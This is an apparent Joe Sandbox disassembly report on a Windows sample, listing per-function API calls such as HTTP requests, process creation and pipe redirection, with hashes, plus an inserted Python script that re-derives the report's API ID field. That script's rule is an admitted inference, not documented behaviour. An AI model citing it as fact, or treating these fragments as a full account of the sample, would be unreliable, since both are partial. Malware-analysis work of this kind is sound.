                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003902C2
                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00390344
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                  • String ID: DllGetClassObject
                                                                  • API String ID: 753597075-1075368562
                                                                  • Opcode ID: 8f8578f07f9a9dfa866f92c82dce3559f1d4ccc4b246beeeed830f9d51cc62a1
                                                                  • Instruction ID: 765dbe2d108298ac92c0f74324579e8af0af8c351eee567c8d9e3dbbc6af66be
                                                                  • Opcode Fuzzy Hash: 8f8578f07f9a9dfa866f92c82dce3559f1d4ccc4b246beeeed830f9d51cc62a1
                                                                  • Instruction Fuzzy Hash: E3415AB5600205EFDF4ACF64C8C4B9A7BB9EF44310F1580AAE9099F246D7B1DA44DBA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00395075
                                                                  • GetMenuItemInfoW.USER32 ref: 00395091
                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003950D7
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00411708,00000000), ref: 00395120
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: cbd7c49c7bc5f0b4a3398603b7665de70d9daf18840f90af94ed7942e6a29a60
                                                                  • Instruction ID: b96259cf912821c28fcbb9ad4808ceee91dd80f453c4a050886164b5a3879013
                                                                  • Opcode Fuzzy Hash: cbd7c49c7bc5f0b4a3398603b7665de70d9daf18840f90af94ed7942e6a29a60
                                                                  • Instruction Fuzzy Hash: E841BF71205701AFDF23DF24D884F6AB7E8AF85324F154A1EF8959B291D730E984CB62
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 003B0587
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: BuffCharLower
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 2358735015-567219261
                                                                  • Opcode ID: c24da4c7d27b1cb8a49dfbfed32254a3e66c44ce2cb2e1d37e8c73c6b46a99bd
                                                                  • Instruction ID: 5764a224ce714ad8df0a3ea99f9ddd2fcf8d54a0417613ee844d6434b305fda9
                                                                  • Opcode Fuzzy Hash: c24da4c7d27b1cb8a49dfbfed32254a3e66c44ce2cb2e1d37e8c73c6b46a99bd
                                                                  • Instruction Fuzzy Hash: B831B270500216AFCF06EF54CD41EEFB3B4FF55314B10862AE926AB6E1DB75A919CB40
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0038B88E
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0038B8A1
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 0038B8D1
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 4561a5c8fc74ff957f58b30fd76a48ccf879e7b34a1e8131f12121b1b5db435e
                                                                  • Instruction ID: 2bd2b6423103d46e779152b8ad8b0659bc70f77c9da875509f519acd1ebca7f6
                                                                  • Opcode Fuzzy Hash: 4561a5c8fc74ff957f58b30fd76a48ccf879e7b34a1e8131f12121b1b5db435e
                                                                  • Instruction Fuzzy Hash: 0721F371A00248BFDB06AB64D886DFEB77CDF05354B10416AF421AB1E0DB744E0A9B60
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003A4401
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A4427
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003A4457
                                                                  • InternetCloseHandle.WININET(00000000), ref: 003A449E
                                                                    • Part of subcall function 003A5052: GetLastError.KERNEL32(?,?,003A43CC,00000000,00000000,00000001), ref: 003A5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 1951874230-3916222277
                                                                  • Opcode ID: a1ce4f4f1ccbf242e782717c1a4288617209e67d19016ac73e83e9052da49331
                                                                  • Instruction ID: b74187514df2e6c44a099a8735f1b6cd0cf232b24bf223bed021d5d4cb80b790
                                                                  • Opcode Fuzzy Hash: a1ce4f4f1ccbf242e782717c1a4288617209e67d19016ac73e83e9052da49331
                                                                  • Instruction Fuzzy Hash: 30219FB2600208BFE7139F55DC85EBFB7ECEB8A758F10801AF50996141EAA48D059770
                                                                  APIs
                                                                    • Part of subcall function 0036D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
                                                                    • Part of subcall function 0036D17C: GetStockObject.GDI32(00000011), ref: 0036D1CE
                                                                    • Part of subcall function 0036D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003B915C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 003B9163
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003B9178
                                                                  • DestroyWindow.USER32(?), ref: 003B9180
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  • Opcode ID: 45e7e1957957c4cad9e4864ad3c288edbc91bad9104b5083b4291bff34fd86b6
                                                                  • Instruction ID: 672c9b05974ec785265d0687b2c12352dd353ca65c44d02a3d625cd997155996
                                                                  • Opcode Fuzzy Hash: 45e7e1957957c4cad9e4864ad3c288edbc91bad9104b5083b4291bff34fd86b6
                                                                  • Instruction Fuzzy Hash: 1421BE71200206BBEF124F68DC88FFA37ADEB99368F11021AFB1496590C375DC41B760
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00399588
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003995B9
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 003995CB
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00399605
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 516ecfd470d32f9bf4aa36e21ac3ce1da7378f2725dbe5ce1aa44a746187f81e
                                                                  • Instruction ID: 778073b6233df19f819558444781325ae3fd03a9e69a9b94afd7b771f0f71c74
                                                                  • Opcode Fuzzy Hash: 516ecfd470d32f9bf4aa36e21ac3ce1da7378f2725dbe5ce1aa44a746187f81e
                                                                  • Instruction Fuzzy Hash: CF214C75600205ABEF229F69DC45B9B7BACAF46720F614A1EF9A1D72D0D770DD40CB20
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00399653
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00399683
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00399694
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003996CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 4f0137495036ad7e0cf5318e1257bbb7b6001a14aa180d811cb85709c9fed4cb
                                                                  • Instruction ID: bfac13e2cabecade7498744e49f6f5faf44f335e5d6862aed10f91ecd28fbd13
                                                                  • Opcode Fuzzy Hash: 4f0137495036ad7e0cf5318e1257bbb7b6001a14aa180d811cb85709c9fed4cb
                                                                  • Instruction Fuzzy Hash: 4C213C716002059BDF22AF6D9C45F9AB7ACAF55734F200A1EF8A1E72D0E7709841CB60
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039DB0A
                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0039DB5E
                                                                  • __swprintf.LIBCMT ref: 0039DB77
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,003EDC00), ref: 0039DBB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  • Opcode ID: 6adfd0330ae14b8be237a66145b66779ad463489d28bebb31106518167d98d0f
                                                                  • Instruction ID: 931d31a7edafe9b3686c4516818b1bf072ca9a45dd6b3c12b8b100e83167ae92
                                                                  • Opcode Fuzzy Hash: 6adfd0330ae14b8be237a66145b66779ad463489d28bebb31106518167d98d0f
                                                                  • Instruction Fuzzy Hash: 3B218635600208AFCB11DF65D985E9EBBFCEF48705B104069F909DB261DB70EA05CB61
                                                                  APIs
                                                                    • Part of subcall function 0038C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0038C84A
                                                                    • Part of subcall function 0038C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0038C85D
                                                                    • Part of subcall function 0038C82D: GetCurrentThreadId.KERNEL32 ref: 0038C864
                                                                    • Part of subcall function 0038C82D: AttachThreadInput.USER32(00000000), ref: 0038C86B
                                                                  • GetFocus.USER32 ref: 0038CA05
                                                                    • Part of subcall function 0038C876: GetParent.USER32(?), ref: 0038C884
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0038CA4E
                                                                  • EnumChildWindows.USER32(?,0038CAC4), ref: 0038CA76
                                                                  • __swprintf.LIBCMT ref: 0038CA90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                  • String ID: %s%d
                                                                  • API String ID: 3187004680-1110647743
                                                                  • Opcode ID: cd88bdedadf794eea661ac73019ae435e3859d4b4e09fc648dbfd1b00085cbce
                                                                  • Instruction ID: 625b40aa2ba9f3adc8edffadd4f90d8aa65228c8dc8430f47b8e6f9e5d2cc60e
                                                                  • Opcode Fuzzy Hash: cd88bdedadf794eea661ac73019ae435e3859d4b4e09fc648dbfd1b00085cbce
                                                                  • Instruction Fuzzy Hash: 411172B15503056BCB17BF649C86FE9377CAB44714F0090A6FE08AA182CB749545DBB0
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00377AD8
                                                                    • Part of subcall function 00377CF4: __mtinitlocknum.LIBCMT ref: 00377D06
                                                                    • Part of subcall function 00377CF4: EnterCriticalSection.KERNEL32(00000000,?,00377ADD,0000000D), ref: 00377D1F
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00377AE5
                                                                  • __lock.LIBCMT ref: 00377AF9
                                                                  • ___addlocaleref.LIBCMT ref: 00377B17
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                  • String ID: `=
                                                                  • API String ID: 1687444384-370013431
                                                                  • Opcode ID: eb8ae5d6f74055b7600cbde6f0ffc1021b4668b96a4f9d508bf820421a3ed978
                                                                  • Instruction ID: 8738d49133d22cb574b1c0a0f4573f207064bd9c73eecb72d71d5a1f99c04245
                                                                  • Opcode Fuzzy Hash: eb8ae5d6f74055b7600cbde6f0ffc1021b4668b96a4f9d508bf820421a3ed978
                                                                  • Instruction Fuzzy Hash: 13016D72504B00DFD732EF75D90674ABBF0EF44321F20890EA49A9B6A0CBB8A640CB15
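The "API ID" line in each record above is a fixed summary of the imported names listed under "APIs". The Python below is added here as an example; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses records in the format shown on this page and re-derives the API ID under a rule inferred from the records on this page (an assumption, not a documented Joe Sandbox algorithm): split each name on CamelCase boundaries, keep CRT names such as __swprintf whole, drop tokens shorter than four characters, count the rest over every call including the "Part of subcall function" lines, then emit the tokens grouped by descending count, each group sorted in ASCII order, groups joined with "$". The embedded sample records are copied from this report and trimmed to the lines the parser needs; records_calling is a hypothetical triage helper, for instance to pull out the block that opens "nul" next to CreatePipe.

```python
"""
Re-derive Joe Sandbox's per-function "API ID" from the "APIs" bullets of a
record and cross-check it against the value the report prints.

Rule inferred from the records on this page (assumption, not a documented
Joe Sandbox algorithm): CamelCase-split each imported name (underscore
names such as __swprintf stay whole), drop tokens shorter than four
characters (Get, Set, Std, Url, Dlg, Ex, Id, W), count the rest over every
call in the block including "Part of subcall function" lines, then group
tokens by descending count, sort each group in ASCII order, concatenate
the group, and join groups with '$'.
"""
import re
from collections import Counter

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally after
# "Part of subcall function ADDR:".  Group 1 = function, group 2 = module.
CALL_RE = re.compile(r'(?:^|[\s:])([A-Za-z_][A-Za-z0-9_]*)\.([A-Z][A-Z0-9]*)(?=[(\s]|$)')
# CamelCase words, or one whole token for underscore-prefixed CRT names.
TOKEN_RE = re.compile(r'_+[a-z0-9]+|[A-Z][a-z0-9]*')
MIN_TOKEN_LEN = 4

# Sample records copied from this report, trimmed to the lines the parser uses.
REPORT_SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003A4401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A4427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003A4457
• InternetCloseHandle.WININET(00000000), ref: 003A449E
  • Part of subcall function 003A5052: GetLastError.KERNEL32(?,?,003A43CC,00000000,00000000,00000001), ref: 003A5067
Strings
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00399588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003995B9
• GetStdHandle.KERNEL32(0000000C), ref: 003995CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00399605
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
APIs
• __lock.LIBCMT ref: 00377AD8
  • Part of subcall function 00377CF4: __mtinitlocknum.LIBCMT ref: 00377D06
  • Part of subcall function 00377CF4: EnterCriticalSection.KERNEL32(00000000,?,00377ADD,0000000D), ref: 00377D1F
• InterlockedIncrement.KERNEL32(?), ref: 00377AE5
• __lock.LIBCMT ref: 00377AF9
• ___addlocaleref.LIBCMT ref: 00377B17
Strings
Similarity
• API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
• String ID: `=
"""


def api_name(bullet):
    """Return (function, module) from one '•' line, or None if it is not a call."""
    m = CALL_RE.search(bullet)
    return (m.group(1), m.group(2)) if m else None


def api_id(names):
    """Compute the report's API ID string from the list of imported names."""
    counts = Counter(tok for name in names
                     for tok in TOKEN_RE.findall(name) if len(tok) >= MIN_TOKEN_LEN)
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return '$'.join(''.join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def parse_records(text):
    """Split report text into records: {'apis', 'modules', 'reported', 'strings'}."""
    records, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == 'APIs':
            cur = {'apis': [], 'modules': set(), 'reported': None, 'strings': None}
            records.append(cur)
            in_apis = True
        elif cur is None:
            continue
        elif line.startswith('• API ID:'):
            cur['reported'] = line.split(':', 1)[1].strip()
        elif line.startswith('• String ID:'):
            cur['strings'] = line.split(':', 1)[1].strip()
        elif in_apis and line.startswith('•'):
            call = api_name(line)
            if call:
                cur['apis'].append(call[0])
                cur['modules'].add(call[1])
        else:
            in_apis = False  # "Strings", "Similarity", "Memory Dump Source", ...
    return records


def cross_check(text):
    """Return [(computed_id, reported_id, matches)] for every record in the text."""
    out = []
    for rec in parse_records(text):
        computed = api_id(rec['apis'])
        out.append((computed, rec['reported'], computed == rec['reported']))
    return out


def records_calling(text, *required):
    """Hypothetical triage helper: records whose API list contains every name in `required`."""
    want = set(required)
    return [r for r in parse_records(text) if want <= set(r['apis'])]


if __name__ == '__main__':
    for computed, reported, ok in cross_check(REPORT_SAMPLE):
        print('OK ' if ok else 'BAD', computed, '|', reported)
    for rec in records_calling(REPORT_SAMPLE, 'CreatePipe', 'CreateFileW'):
        print('stdio-to-nul block:', rec['apis'], sorted(rec['modules']), rec['strings'])
```

Run it against a saved copy of a report to check every record; a mismatch between the computed and the printed value means the tokenisation rule above does not cover that record, which is useful to know before relying on API IDs to cluster functions across samples.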
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003BE33D
                                                                  • _memset.LIBCMT ref: 003BE34C
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00413D00,00413D44), ref: 003BE37B
                                                                  • CloseHandle.KERNEL32 ref: 003BE38D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                  • String ID: D=A
                                                                  • API String ID: 3277943733-3823224246
                                                                  • Opcode ID: 906d17e6a974e141c4f500a8eaf9e40e05d45182090dbfd2e6f693858d1a71c3
                                                                  • Instruction ID: 98f7bc396baa511a23a8b46edb4dd0fdfd8ddbab85e1355fe9b4aed220a45c5a
                                                                  • Opcode Fuzzy Hash: 906d17e6a974e141c4f500a8eaf9e40e05d45182090dbfd2e6f693858d1a71c3
                                                                  • Instruction Fuzzy Hash: F8F05EF5540304BAE3215FA5BC45FF77E5CDB04756F008432BE08EA1A2D3799E1086AC
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003B19F3
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003B1A26
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003B1B49
                                                                  • CloseHandle.KERNEL32(?), ref: 003B1BBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  • Opcode ID: 9829712466b89078da7207d51d8fb1ab2dba3f48a821e154c7fd1cffb743a786
                                                                  • Instruction ID: d6c224d9358ff11d5fbd5d29e50670e89b535158e99460bfa21bb4e8cab037e2
                                                                  • Opcode Fuzzy Hash: 9829712466b89078da7207d51d8fb1ab2dba3f48a821e154c7fd1cffb743a786
                                                                  • Instruction Fuzzy Hash: 5181A370600204ABDF12DF64C896BAEBBE9EF08724F15C459F905AF396D7B4E941CB90
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003BE1D5
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003BE20D
                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 003BE248
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 003BE269
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003BE281
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                  • String ID:
                                                                  • API String ID: 3188977179-0
                                                                  • Opcode ID: e889eb63e9c7977ec71457ce097f1c2fb8831cb81abe107a792344d6b322dea9
                                                                  • Instruction ID: 9b5346d58d317f21b04566039755a8a9817ef47de5bc6672b0d84c0252a10931
                                                                  • Opcode Fuzzy Hash: e889eb63e9c7977ec71457ce097f1c2fb8831cb81abe107a792344d6b322dea9
                                                                  • Instruction Fuzzy Hash: 4861B434A00204AFDB22DF6CC855FEA77BAEF49308F15805AFA599B7A1C771AD40CB50
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00391CB4
                                                                  • VariantClear.OLEAUT32(00000013), ref: 00391D26
                                                                  • VariantClear.OLEAUT32(00000000), ref: 00391D81
                                                                  • VariantClear.OLEAUT32(?), ref: 00391DF8
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00391E26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                  • String ID:
                                                                  • API String ID: 4136290138-0
                                                                  • Opcode ID: f951dd1317169532905063b88354591b1fa88a235cbe366780819dc92218ebdb
                                                                  • Instruction ID: 370d2a1e7130e2dfe3be22b8ea1e5a90fad53fbfe3f14338388eb021eecced27
                                                                  • Opcode Fuzzy Hash: f951dd1317169532905063b88354591b1fa88a235cbe366780819dc92218ebdb
                                                                  • Instruction Fuzzy Hash: D9513BB5A0020AAFDF15CF58D880AAAB7B8FF4C314B158559E959EB341E730E951CBA0
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003B06EE
